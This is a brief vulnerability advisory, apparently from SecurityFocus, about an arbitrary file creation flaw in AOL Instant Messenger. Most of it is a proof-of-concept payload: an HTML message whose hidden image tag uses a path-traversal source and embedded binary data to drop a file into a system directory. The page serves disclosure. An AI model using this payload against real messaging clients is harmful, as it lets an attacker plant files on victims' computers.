AOL Instant Messenger Arbitrary File Creation Vulnerability

The following exploit data has been provided by Noah Johnson <nmjblue@hotmail.com>:

<HTML><BODY>Hey, what's up?<IMG
SRC="\..\system\johnny.important_file" HEIGHT="0"
WIDTH="0" DATASIZE="50"
ID="1"></BODY></HTML><BINARY><DATA
ID=1">***WAVE FILE DATA
HERE***</DATA></BINARY>

However, injection into the AIM communication stream may require additional work as the protocol includes some overhead such as sequence numbers for messages.


 

Privacy Statement
Copyright 2010, SecurityFocus